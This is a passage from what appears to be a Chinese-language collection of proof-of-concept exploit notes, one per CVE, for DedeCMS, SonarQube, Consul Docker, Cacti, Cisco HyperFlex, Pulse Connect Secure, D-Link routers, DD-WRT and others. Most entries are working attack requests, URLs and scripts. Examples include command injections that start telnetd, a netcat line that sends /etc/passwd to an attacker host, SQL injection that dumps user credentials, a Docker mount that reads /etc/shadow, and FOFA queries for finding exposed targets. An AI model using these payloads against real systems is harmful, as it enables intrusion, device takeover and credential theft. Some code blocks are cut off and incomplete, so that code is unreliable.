20 | byte[] payload = Base64.getDecoder().decode(b64Payload);
21 | byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
22 |
23 | byte[] enc = BlobCrypt.encryptArray(payload, key);
24 | System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
25 | byte[] dec = BlobCrypt.decryptArray(enc, key);
26 | }
27 | }
28 | ```
29 |
30 | ref:
31 |
32 | https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e#file-csm_pocs-md
33 |
34 | https://forum.ywhack.com/thread-114711-1-4.html
--------------------------------------------------------------------------------
/CVE-2020-27533 DedeCMS v.5.8搜索功能 "keyword"参数XSS漏洞 PoC.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-27533 DedeCMS v.5.8搜索功能 "keyword"参数XSS漏洞 PoC
2 |
3 | 描述:
4 |
5 | 在DedeCMS v.5.8的搜索功能中 "keyword"参数参数发现了跨站点脚本(XSS)问题,该问题使恶意用户可以将代码注入到网页中,并且其他用户在查看网页时也会受到影响。
6 |
7 | PoC :
8 |
9 |
10 | ```
11 | POST /DedeCMSv5-master/src/dede/action_search.php HTTP/1.1
12 | Host: 127.0.0.1
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
15 | Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
16 | Accept-Encoding: gzip, deflate
17 | Content-Type: application/x-www-form-urlencoded
18 | Content-Length: 47
19 | Origin: http://127.0.0.1
20 | Connection: close
21 | Referer: http://127.0.0.1/DedeCMSv5-master/src/dede/
22 | Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=dgj9gs48q9nbrckdq0ei5grjd7; _csrf_name_7ac3ea0e=8a824367d97bb8f984d4af7a1ad11308; _csrf_name_7ac3ea0e__ckMd5=c692dd4f707ea756; DedeUserID=1; DedeUserID__ckMd5=7e44b1ee92d784aa; DedeLoginTime=1603530632; DedeLoginTime__ckMd5=69967c5a8db15fb4; dede_csrf_token=80866e4429220e784f2514d38de9a5ea; dede_csrf_token__ckMd5=de396c60d5d75d93
23 | Upgrade-Insecure-Requests: 1
24 |
25 | keyword=">
26 | ```
27 |
28 | https://www.exploit-db.com/exploits/48974
29 |
30 | https://forum.ywhack.com/thread-114662-1-5.html
--------------------------------------------------------------------------------
/CVE-2020-27986 SonarQube api 未授权访问.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-27986 SonarQube api 未授权访问
2 |
3 |
4 | SonarQube配置不当造成未授权访问,可以通过api/settings/values获取明文SMTP、SVN和Gitlab等敏感信息
5 |
6 | PoC:
7 |
8 | http://[server]/api/settings/values
9 |
10 | 
11 |
12 |
13 | ref:
14 |
15 | https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
16 |
17 | https://forum.ywhack.com/thread-114647-1-6.html
--------------------------------------------------------------------------------
/CVE-2020-29133 Coremail 存储型XSS.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-29133 Coremail 存储型XSS
2 |
3 | PoC:
4 |
5 | ```
6 | coremail/XT5/jsp/upload.jsp 上传 1.jpg.html
7 | ```
8 |
9 | 获取对应的hashId获取到对应的地址
10 |
11 | 
12 |
13 |
14 | 
15 |
16 |
17 | 
18 |
--------------------------------------------------------------------------------
/CVE-2020-29564 Consul Docker images 空密码登录漏洞.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-29564 Consul Docker images 空密码登录漏洞
2 |
3 | Consul Docker images 0.7.1至1.4.2版本部署的Consul Docker容器的系统,可能允许远程攻击者使用空白密码来实现root用户访问。
4 |
5 | **PoC:**
6 |
7 | ```bash
8 | docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine
9 |
10 | File Access: cat /mnt/etc/shadow
11 | RCE: chroot /mnt
12 | ```
13 |
14 | FOFA:
15 |
16 | ```
17 | port="2375" && protocol=="docker"
18 | ```
19 |
20 | 
21 |
22 |
23 | 
24 |
25 |
26 | **ref:**
27 |
28 | * https://forum.ywhack.com/thread-114824-1-2.html
29 | * https://github.com/koharin/koharin2/blob/main/CVE-2020-29564
--------------------------------------------------------------------------------
/CVE-2020-36179〜82 Jackson-databind SSRF&RCE.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-36179〜82 Jackson-databind SSRF&RCE
2 |
3 | * CVE-2020-36179:
4 | * CVE-2020-36180
5 | * CVE-2020-36181
6 | * CVE-2020-36182
7 |
8 | RCE:
9 |
10 | PoC Github:https://github.com/Al1ex/CVE-2020-36179
11 |
12 | 本地复现成功:
13 |
14 | 
15 |
16 | ref:
17 |
18 | https://forum.ywhack.com/thread-114949-1-1.html
19 |
--------------------------------------------------------------------------------
/CVE-2020-6308 SAP POC.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-6308 SAP POC
2 |
3 | SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数,以在内部网络上执行查找,否则将无法从外部访问该内部网络。成功利用后,攻击者可以扫描内部网络以确定内部基础结构,并收集信息以进行进一步的攻击,例如远程文件包含,检索服务器文件,绕过防火墙并迫使易受攻击的服务器执行恶意请求,从而导致服务器端请求伪造漏洞。
4 |
5 | 详情参考:https://github.com/InitRoot/CVE-2020-6308-PoC
6 |
7 | 
8 |
9 |
10 | **PoC:**
11 |
12 | ```bash
13 | POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
14 | Host: 192.168.0.191:8080
15 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
17 | Accept-Language: en-US,en;q=0.5
18 | Accept-Encoding: gzip, deflate
19 | Content-Type: application/x-www-form-urlencoded
20 | Content-Length: 128
21 | Origin: http://192.168.0.191:8080
22 | Connection: close
23 | Referer: http://192.168.0.191:8080/AdminTools/querybuilder/ie.jsp
24 | Upgrade-Insecure-Requests: 1
25 |
26 | aps=192.168.0.191&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
27 | ```
--------------------------------------------------------------------------------
/CVE-2020-8255 Pulse Connect Secure通过登录消息组件实现任意文件读取.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-8255 Pulse Connect Secure通过登录消息组件实现任意文件读取
2 |
3 | 概述:
4 |
5 | Pulse Connect Secure在登录前/后消息组件中存在任意文件读取漏洞。经过身份验证的管理用户可以利用此漏洞从底层操作系统读取任意文件。
6 |
7 | PoC:
8 |
9 |
10 | ```bash
11 | 首先创建en.txt和default.txt文件:
12 | ln -s /etc/passwd default.txt
13 | ln -s /etc/passwd en.txt
14 | 使用--symlinks选项压缩文件:
15 | zip --symlinks logon.zip default.txt en.txt
16 | adding: default.txt (stored 0%)
17 | adding: en.txt (stored 0%)
18 | ```
19 |
20 | 通过/dana-admin/auth/signinNotif.cgi页面上传zip包,最后通过/dana-admin/auth/signinPolicy.cgi触发任意文件读取。
21 |
22 | 
23 |
24 |
25 | ref:
26 |
27 | https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-arbitrary-file-read-via-logon-message-cve-2020-8255/
28 |
29 | https://forum.ywhack.com/thread-114616-1-6.html
--------------------------------------------------------------------------------
/CVE-2020-8277:Node.js通过DNS请求实现拒绝服务.md:
--------------------------------------------------------------------------------
1 | # CVE-2020-8277:Node.js通过DNS请求实现拒绝服务
2 |
3 | 近日,Node.js官方发布最新安全版本公告,披露在v12.x,v14.x和v15.x 相应的Node.js版本中存在一处高风险的拒绝服务漏洞(CVE-2020-8277)。受影响的Node.js应用允许攻击者对目标主机发送DNS请求,利用Node.js应用解析大量响应的DNS记录来对目标主机实现拒绝服务攻击。
4 |
5 | 影响版本:
6 |
7 | * Node.js 12.x: 12.16.3-12.19.1
8 | * Node.js 14.x: 14.13.0-14.15.1
9 | * Node.js 15.x全部版本
10 |
11 | Quick Run:
12 |
13 |
14 | ```bash
15 | # clone this repository
16 | $ git clone https://github.com/masahiro331/CVE-2020-8277
17 |
18 | # run bind
19 | $ docker build -t bind-local ./bind
20 | # Need TCP fallback
21 | $ docker run --rm --name bind -it -p 53:53 -p 53:53/udp bind
22 |
23 | # use "< v15.2.1" version
24 | # If you use fixed version, build node.
25 | $ git clone https://github.com/nodejs/node
26 | $ git checkout df211208c0
27 | $ ./configure
28 | $ make -j8
29 | $ make install
30 |
31 | # Run PoC
32 | $ node main.js
33 | ```
34 |
35 | main.js:
36 |
37 | ```js
38 | // const SegfaultHandler = require('segfault-handler');
39 | // SegfaultHandler.registerHandler('crash.log');
40 |
41 | const { Resolver } = require('dns');
42 | const resolver = new Resolver();
43 | resolver.setServers(['127.0.0.1']);
44 | x = 0
45 | resolver.resolve4('safe.masahiro331.com', (err, addresses) => {
46 | while (x < 1000) {
47 | console.log(x);
48 | console.log(addresses[x])
49 | x += 1;
50 | }
51 | console.log(err);
52 | });
53 |
54 | ```
55 |
56 | ref:
57 |
58 | https://github.com/masahiro331/CVE-2020-8277
59 |
60 | https://www.safedog.cn/news.html?id=4599
61 |
62 | https://forum.ywhack.com/thread-114728-1-4.html
--------------------------------------------------------------------------------
/CVE-2020–24723 存储XSS的故事导致管理帐户接管.md:
--------------------------------------------------------------------------------
1 | # CVE-2020–24723 存储XSS的故事导致管理帐户接管
2 |
3 | CVE:https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24723
4 |
5 | Exploit Title: User Registration & Login and User Management System 2.1— Stored Cross-Site Scripting
6 |
7 | 此漏洞可能导致攻击者在用户注册注入XSS Padylod,每次管理员从管理面板访问管理用户部分时,XSS触发器和攻击者可以根据精心制作的Payload窃取cookie。
8 |
9 | 漏洞参数:Last Name
10 |
11 | 复现步骤:
12 |
13 | * 1,访问注册页面
14 | * 2,填写详细信息,将XSS Padyload 放入名字,姓氏。
15 | * 3,访问管理面板。可以看到我们的有效载荷被执行。
16 |
17 | 
18 |
19 |
20 | ref:
21 |
22 | https://medium.com/bugbountywriteup/cve-2020-24723-89ea76588286
--------------------------------------------------------------------------------
/CVE-2020–4280 — IBM QRadar Java反序列化分析和绕过.md:
--------------------------------------------------------------------------------
1 | # CVE-2020–4280 — IBM QRadar Java反序列化分析和绕过
2 |
3 |
4 | 周,国外安全研究员发布了一个IBM Qradar SIEM Java Deser漏洞。 CVE编号:CVE-2020–4280 (详情)
5 |
6 | Qradar不仅有企业版,同时也具有社区版。
7 |
8 | 可以从这里下载:https://developer.ibm.com/qradar/ce/,目前只有Community Edition版本7.3.3,而Enterprise Edition当前正在使用7.4.1版本。登录后,将下载一个ova文件,以导入到VMWare/Virtual Box中。
9 |
10 | 安装过程可以参考:https://kifarunix.com/how-to-install-ibm-qradar-ce-v7-3-1-on-
11 |
12 | 作者使用的poc:
13 |
14 |
15 | ```xml
16 |
17 | ```
18 |
19 | 在作者的原始PoC中,有一个比较麻烦的句柄:
20 | 使用Jython1小工具启用console.enableExecuteCommand- >属性,然后调用Qradar.executeCommand()。
21 |
22 | 另一种方法可以更简洁地处理,即使用定制版本的ROME小工具执行并响应正文,PoC结果如下:
23 |
24 | 
25 |
26 |
27 | Bypass CVE-2020–4280:
28 |
29 | 
30 |
31 |
32 | ref:
33 |
34 | https://testbnull.medium.com/cve-2020-4280-ibm-qradar-java-deserialization-anlysis-and-bypass-c3fe57207057
35 |
36 | https://www.securify.nl/advisory/java-deserialization-vulnerability-in-qradar-remotejavascript-servlet
37 |
38 | https://forum.ywhack.com/thread-114654-1-5.html
39 |
40 |
--------------------------------------------------------------------------------
/CVE-2021-3156 (Baron Samedit) Sudo 中基于堆的缓冲区溢出漏洞.md:
--------------------------------------------------------------------------------
1 | # CVE-2021-3156 (Baron Samedit) Sudo 中基于堆的缓冲区溢出漏洞
2 |
3 | Qualys研究小组发现了sudo中的堆溢出漏洞,该漏洞在类似Unix的主要操作系统上都可以使用。通过利用此漏洞,任何没有特权的用户都可以使用默认的sudo配置在易受攻击的主机上获得root特权。
4 |
5 | **受影响版本:**
6 |
7 | * 从1.8.2到1.8.31p2的所有旧版
8 | * 从1.9.0到1.9.5p1的所有稳定版本
9 |
10 | 用户可以使用非root的账户登录系统,运行“ sudoedit -s / ”命令,若返回以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。不受影响的系统将显示以“ usage:”开头的错误。
11 |
12 | **PoC:**
13 |
14 | https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
15 |
16 | https://github.com/r4j0x00/exploits/tree/master/CVE-2021-3156
17 |
18 | https://github.com/lockedbyte/CVE-Exploits/tree/master/CVE-2021-3156
19 |
20 | PoC验证视频:https://vimeo.com/504872555
21 |
22 | 详情:https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
23 |
24 |
--------------------------------------------------------------------------------
/Cacti SQL 注入漏洞(CVE-2020-14295).md:
--------------------------------------------------------------------------------
1 | # Cacti SQL 注入漏洞(CVE-2020-14295)
2 |
3 | Cacti 1.2.12 中 color.php 中存在 SQL注入漏洞,允许具有管理员权限的攻击者通过 filter 参数注入 SQL。因为产品接受堆积的查询,所以这可能导致远程命令执行。目前该漏洞 EXP 已公开。
4 |
5 | 影响版本:
6 |
7 | Cacti < 1.2.13
8 |
9 | 详情可以参考:https://github.com/Cacti/cacti/issues/3622
10 |
11 | PoC:
12 |
13 | ```
14 | /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+user_auth+set+username='sqli'+where+id=3;--+-
15 |
16 | ```
--------------------------------------------------------------------------------
/Chrome 插件 Vue.js devtools UXSS.md:
--------------------------------------------------------------------------------
1 | # Chrome 插件 Vue.js devtools UXSS
2 |
3 |
4 | 在中devtools-background.js,toast函数中存在代码注入。它可以由任何选项卡中的postMessage触发,从而在打开浏览器的开发人员工具(F12)时产生通用XSS。攻击者可以托管一个特制网页来利用此漏洞,然后诱使用户查看该网页并在其他Chrome标签中打开开发人员工具(F12)。
5 |
6 | 条件有点苛薄...需要安装特定版本插件,然后访问指定PoC网页 最后打开开发者工具(F12)进行触发..
7 |
8 | 受影响版本:
9 |
10 | * Vue.js devtools 5.3.3
11 | * Vue.js devtools 6.0.0 beta3
12 |
13 | 详细分析见:https://github.com/vuejs/vue-devtools/issues/1353
14 |
15 | chrome插件:https://chrome.google.com/webstore/detail/vuejs-devtools/nhdogjmejiglipccpnnnanhbledajbpd
16 |
17 | **PoC1:**
18 |
19 | ```js
20 |
30 | ```
31 |
32 | POC2:
33 |
34 | ```js
35 |
47 | ```
48 |
49 | 
50 |
51 |
52 | ref:
53 |
54 | https://github.com/vuejs/vue-devtools/issues/1353
55 |
56 | https://forum.ywhack.com/thread-115069-1-1.html
--------------------------------------------------------------------------------
/Cisco HyperFlex HX 任意文件上传(CVE-2021-1499).md:
--------------------------------------------------------------------------------
1 | # Cisco HyperFlex HX 任意文件上传(CVE-2021-1499)
2 |
3 | Cisco HyperFlex HX数据平台基于Web的管理界面中的漏洞可能允许未经身份验证的远程攻击者将文件上传到受影响的设备。
4 |
5 |
6 | ```
7 | wvu@kharak:~$ curl -v http://192.168.123.133/upload -F x=@/dev/null
8 | * Trying 192.168.123.133...
9 | * TCP_NODELAY set
10 | * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
11 | > POST /upload HTTP/1.1
12 | > Host: 192.168.123.133
13 | > User-Agent: curl/7.64.1
14 | > Accept: */*
15 | > Transfer-Encoding: chunked
16 | > Content-Type: multipart/form-data; boundary=------------------------1b9a7fe625152b78
17 | > Expect: 100-continue
18 | >
19 | < HTTP/1.1 100 Continue
20 | * Signaling end of chunked upload via terminating chunk.
21 | < HTTP/1.1 200 OK
22 | < Server: nginx/1.8.1
23 | < Date: Tue, 18 May 2021 01:10:59 GMT
24 | < Content-Type: application/json;charset=ISO-8859-1
25 | < Content-Length: 56
26 | < Connection: keep-alive
27 | < Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
28 | < X-Content-Type-Options: nosniff
29 | < X-XSS-Protection: 1; mode=block
30 | <
31 | {"result": "filename: /var/www/localhost/images//null"}
32 | * Connection #0 to host 192.168.123.133 left intact
33 | * Closing connection 0
34 | wvu@kharak:~$
35 | ```
36 |
37 | ref:
38 |
39 | * https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
40 | * https://attackerkb.com/topics/Z2MeUsvSlT/cve-2021-1499
41 | * https://nvd.nist.gov/vuln/detail/CVE-2021-1499
--------------------------------------------------------------------------------
/Cisco HyperFlex HX 命令注入(CVE-2021-1497-CVE-2021-1498).md:
--------------------------------------------------------------------------------
1 | # Cisco HyperFlex HX 命令注入(CVE-2021-1497/CVE-2021-1498)
2 |
3 |
4 | Cisco HyperFlex HX的基于Web的管理界面中的多个漏洞可能允许未经身份验证的远程攻击者对受影响的设备执行命令注入攻击。
5 |
6 |
7 | ```
8 | wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'
9 | * Trying 192.168.123.133...
10 | * TCP_NODELAY set
11 | * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)
12 | > POST /storfs-asup HTTP/1.1
13 | > Host: 192.168.123.133
14 | > User-Agent: curl/7.64.1
15 | > Accept: */*
16 | > Content-Length: 28
17 | > Content-Type: application/x-www-form-urlencoded
18 | >
19 | * upload completely sent off: 28 out of 28 bytes
20 | < HTTP/1.1 200 OK
21 | < Server: nginx/1.8.1
22 | < Date: Tue, 18 May 2021 00:54:26 GMT
23 | < Content-Length: 0
24 | < Connection: keep-alive
25 | < Front-End-Https: on
26 | <
27 | * Connection #0 to host 192.168.123.133 left intact
28 | * Closing connection 0
29 | wvu@kharak:~$
30 |
31 | ```
32 |
33 | ref:
34 |
35 | * https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497?referrer=home
36 | * https://nvd.nist.gov/vuln/detail/CVE-2021-1497
37 | * https://nvd.nist.gov/vuln/detail/CVE-2021-1498
--------------------------------------------------------------------------------
/Coremail论客邮件系统路径遍历与文件上传漏洞.md:
--------------------------------------------------------------------------------
1 | # Coremail论客邮件系统路径遍历与文件上传漏洞
2 |
3 | 监测到Coremail论客邮件系统存在路径遍历与文件上传漏洞,攻击者可利用/lunkr/cache/;/;/../../manager/html 设置参数X-Forwarded-For: 127.0.0.1.Coremail 的 nginx 配置文件中,未针对/lunkr/cache 路径向上解析的时候做 X-Forwarded-For 字段的限制,从而可以利用该接口实现配合利用 nginx 不解析,但 tomcat 解析的差异特性,实现绕过 tomcat manager 的本地 ip 限制。
4 |
5 | 情报见:https://forum.ywhack.com/viewthread.php?tid=115403
6 |
7 | 通过/lunkr/cache/;/;/../../manager/html进入Tomcat控制台,部署war包进行getshell。
8 |
9 | 
10 |
11 | https://forum.ywhack.com/thread-115484-1-5.html
--------------------------------------------------------------------------------
/D-LINK DIR-802 命令注入漏洞(CVE-2021-29379).md:
--------------------------------------------------------------------------------
1 | # D-LINK DIR-802 命令注入漏洞(CVE-2021-29379)
2 |
3 |
4 | DIR-802中存在一个命令注入漏洞,攻击者可以通过精心制作的M-SEARCH数据包向UPnP注入任意命令。
5 |
6 | 受影响设备及软件版本
7 |
8 | DIR-802 hardware revision Ax before v1.00b05
9 |
10 | PoC:
11 |
12 | ```py
13 | # coding: utf-8
14 | import socket
15 | import struct
16 | buf = 'M-SEARCH * HTTP/1.1\r\nHOST:192.168.0.1:1900\r\nST:urn:schemas-upnp-org:service
17 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
18 | s.connect(("192.168.0.1", 1900))
19 | s.send(buf)
20 | s.close()
21 | ```
22 |
23 | ref:
24 |
25 | * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29379
26 | * https://cool-y.github.io/2021/03/02/DIR-802-OS-Command-Injection/
--------------------------------------------------------------------------------
/D-LINK DIR-841 命令注入(CVE-2021-28143).md:
--------------------------------------------------------------------------------
1 | # D-LINK DIR-841 命令注入(CVE-2021-28143)
2 |
3 |
4 | D-Link DIR-841 3.03和3.04 存在经过身份验证的命令注入,通过“系统工具”(ping/ping6/traceroute)命令注入,可导致攻击者进行完全控制设备。
5 |
6 | PoC:
7 |
8 |
9 | ```
10 | POST /jsonrpc HTTP/1.1
11 | Host: IP
12 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
13 | Accept: application/json, text/plain, */*
14 | Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
15 | Accept-Encoding: gzip, deflate
16 | Content-Type: application/json;charset=utf-8
17 | Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
18 | Content-Length: 156
19 | Origin: IP
20 | Connection: close
21 | Referer: http://ip-address:9821/admin/index.html
22 | Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=
23 |
24 | {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & sleep 5'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
25 | ```
26 |
27 | Exfiltrating files
28 |
29 |
30 | ```
31 | POST /jsonrpc HTTP/1.1
32 | Host: IP
33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
34 | Accept: application/json, text/plain, */*
35 | Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
36 | Accept-Encoding: gzip, deflate
37 | Content-Type: application/json;charset=utf-8
38 | Authorization: Digest username="admin", realm="domain", nonce="4784226", uri="/jsonrpc", response="84799b55020cf2c53e28214e3d60b899", qop=auth, nc=00000035, cnonce="bPzBB3mcvSb51Ijx"
39 | Content-Length: 156
40 | Origin: IP
41 | Connection: close
42 | Referer: http://ip-address:9821/admin/index.html
43 | Cookie: user_ip=0.0.0.0; device_mode=router; user_login=admin; device-session-id=
44 |
45 | {"jsonrpc":"2.0","method":"write","params":{"id":166,"data":{"host":"'127.0.0.1 & nc SERVER-IP 1234 < /etc/passwd'","count":1,"is_ipv6":false,"max_ttl":30,"nqueries":2,"waittime":3},"save":true},"id":757}
46 | ```
47 |
48 | ref:
49 |
50 | * https://nvd.nist.gov/vuln/detail/CVE-2021-28143
51 | * https://github.com/vitorespf/Advisories/blob/master/DLINK-DIR-841-command-injection.txt
--------------------------------------------------------------------------------
/D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506).md:
--------------------------------------------------------------------------------
1 | # D-LInk DNS320 FW v2.06B01 命令注入(CVE-2020-25506)
2 |
3 | 固件版本为v2.06B01(ftp://ftp2.dlink.com/SECURITY_ADVISEMENTS/DNS-320/REVA/DNS-320_REVA_FIRMWARE_v2.06B01.zip)
4 |
5 | 'cgi_ntp_time'函数中存在命令注入。'v6'的值与“(sntp-r%s> / dev / null”)拼接,然后传递到系统中执行
6 |
7 | PoC:
8 |
9 | ```
10 | /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`id`
11 | ```
12 |
13 | ref:
14 |
15 | * https://nvd.nist.gov/vuln/detail/CVE-2020-25506
16 | * https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675
--------------------------------------------------------------------------------
/D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078.md:
--------------------------------------------------------------------------------
1 | # D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
2 |
3 | D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面。
4 |
5 | FOFA:
6 |
7 | app="D_Link-DCS-2530L"
8 |
9 | 影响版本:
10 |
11 | * DCS-2530L
12 | * DCS-2670L
13 | * DCS-4603
14 | * DCS-4622
15 | * 等多个DCS系列系统
16 |
17 | PoC:
18 |
19 | ```
20 | http://xxx.xxx.xxx.xxx/config/getuser?index=0
21 | ```
22 |
23 | ref:
24 |
25 | https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
--------------------------------------------------------------------------------
/D-Link DIR-846路由器 命令注入 (CVE-2020-27600).md:
--------------------------------------------------------------------------------
1 | # D-Link DIR-846路由器 命令注入 (CVE-2020-27600)
2 |
3 | D-Link DIR-846 A1_100.26 路由器中的HNAP1/control/SetMasterWLanSettings.php允许远程攻击者通过ssid0或ssid1参数进行执行任意命令。
4 |
5 | PoC:
6 |
7 | 需要登录Web控制台,然后访问/Wireless.html无线设置页面。
8 |
9 |
10 | ```bash
11 | POST /HNAPI HTTP/1.1
12 | ...
13 | $data["ssid0"]="'x;telnetd;'"
14 | ```
15 |
16 | ref:
17 |
18 | * https://nvd.nist.gov/vuln/detail/CVE-2020-27600
19 | * https://github.com/pwnninja/dlink/blob/main/DIR-846_SetMasterWLanSettingsCI.md
20 |
--------------------------------------------------------------------------------
/D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568).md:
--------------------------------------------------------------------------------
1 | # D-Link DSR-250 DSR-1000N 命令注入(CVE-2020-18568)
2 |
3 | 影响版本:DSR-250(3.14)DSR-1000N(2.11B201)
4 |
5 | 固件包中有一个upnpd程序,该程序在0.0.0.0上侦听端口1900(udp)和49152(tcp)。通过逆向分析,当程序设置iptable时,未检查参数,这可能导致命令注入。
6 |
7 | **PoC:**
8 |
9 |
10 | ```xml
11 | POST /upnp/control/WANIPConn1 HTTP/1.1
12 | HOST: $control_host:$control_port
13 | Content-Length: $content_length
14 | Content-Type: text/xml; charset="utf-8"
15 | SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
16 |
17 |
18 |
19 |
20 | 7331
21 | tcp
22 | 1337
23 |
24 | 1
25 | hackedByC0ss4ck
26 | 0.0.0.0
27 | ;telnetd -p 24;
28 |
29 |
30 |
31 | ```
32 |
33 | ref:
34 |
35 | * https://nvd.nist.gov/vuln/detail/CVE-2020-18568
36 | * https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a
--------------------------------------------------------------------------------
/D-link DSL-2888A 未授权访问漏洞 (CVE-2020-24579).md:
--------------------------------------------------------------------------------
1 | # D-link DSL-2888A 未授权访问漏洞 (CVE-2020-24579)
2 |
3 | D-Link DSL-2888A devices 存在授权问题漏洞,该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。
4 |
5 | FOFA:
6 |
7 | ```
8 | "DSL-2888A"
9 | ```
10 |
11 | **PoC:**
12 |
13 | ```bash
14 | 1.访问路由器Web管理地址:http://192.168.1.1/
15 | 2.输入任何字符串作为密码进行登录
16 | 3.提示密码无效,但是创建了有效的访问会话
17 | 4.访问任何经过身份验证的页面,比如:/WiFi.shtml
18 | http://192.168.1.1/WiFi.shtml
19 | ```
20 |
21 | 
22 |
23 |
24 | ref:
25 |
26 | * http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1471
27 | * https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28241
28 | * https://forum.ywhack.com/thread-115029-1-1.html
--------------------------------------------------------------------------------
/D-link DSL-2888A 远程代码执行漏洞 (CVE-2020-24581).md:
--------------------------------------------------------------------------------
1 | # D-link DSL-2888A 远程代码执行漏洞 (CVE-2020-24581)
2 |
3 | D-link DSL-2888A是中国D-link公司的一款统一服务路由器。D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在安全漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。
4 |
5 | PS:需身份验证
6 |
7 | FOFA:
8 |
9 | ```
10 | "DSL-2888A"
11 | ```
12 |
13 | **PoC:**
14 |
15 | ```
16 | http://DeviceIP/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=ls
17 | ```
18 |
19 | 
20 |
21 |
22 | 
23 |
24 |
25 | ref:
26 |
27 | * http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1466
28 | * https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28241
29 | * https://forum.ywhack.com/thread-115030-1-1.html
30 | * https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
--------------------------------------------------------------------------------
/DD-WRT 缓冲区溢出漏洞(CVE-2021-27137).md:
--------------------------------------------------------------------------------
1 | # DD-WRT 缓冲区溢出漏洞(CVE-2021-27137)
2 |
3 | DD-WRT是基于Linux的固件,用于无线路由器和接入点。最初是为Linksys WRT54G系列设计的,现在可在多种型号上运行。
4 |
5 | 影响版本:
6 |
7 | DD-WRT 45723 或更低版本
8 |
9 | **PoC:**
10 |
11 | ```py
12 | import socket
13 |
14 | target_ip = "192.168.15.124" # IP Address of Target
15 | off = "D"*164
16 | ret_addr = "AAAA"
17 |
18 | payload = off + ret_addr
19 |
20 | packet = \
21 | 'M-SEARCH * HTTP/1.1\r\n' \
